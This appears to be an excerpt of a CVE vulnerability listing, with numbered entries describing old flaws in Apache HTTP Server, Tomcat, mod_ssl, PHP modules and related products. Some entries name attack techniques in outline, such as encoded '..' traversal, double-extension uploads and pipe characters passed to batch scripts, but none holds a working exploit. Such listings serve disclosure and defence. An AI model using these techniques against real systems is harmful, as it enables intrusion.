13745| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
13746| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
13747| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
13748| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13749| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
13750| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
13751| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
13752| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
13753| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
13754| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
13755| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
13756| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
13757| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
13758| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
13759| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
13760| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
13761| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
13762| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
13763| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
13764| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13765| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13766| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
13767| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
13768| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
13769| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
13770| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
13771| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
13772| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
13773| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
13774| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
13775| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
13776| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
13777| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
13778| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
13779| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
13780| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
13781| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
13782| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
13783| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
13784| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
13785| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
13786| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
13787| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
13788| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
13789| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
13790| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
13791| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13792| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13793| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
13794| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
13795| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
13796| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
13797| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
13798| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
13799| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
13800| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
13801| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
13802| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
13803| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
13804| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
13805| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
13806| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
13807| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
13808| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
13809| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
13810| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
13811| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
13812| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
13813| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
13814| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
13815| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
13816| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
13817| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
13818| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
13819| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
13820| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
13821| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
13822| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
13823| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
13824| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
13825| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
13826| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
13827| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
13828| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
13829| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
13830| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
13831| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
13832| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
13833| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
13834| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
13835| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
13836| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
13837| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
13838| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13839| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
13840| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
13841| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
13842| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
13843| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
13844| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
13845| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
13846| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
13847| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
13848| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
13849| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
13850| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
13851| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
13852| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
13853| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
13854| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
13855| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
13856| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
13857| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
13858| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
13859| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
13860| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
13861| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
13862| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
13863| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
13864| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
13865| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
13866| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
13867| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
13868| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
13869| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
13870| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
13871| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
13872| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
13873| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
13874| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
13875| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
13876| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
13877| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
13878| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
13879| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
13880| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
13881| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
13882| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
13883| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
13884| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
13885| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
13886| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
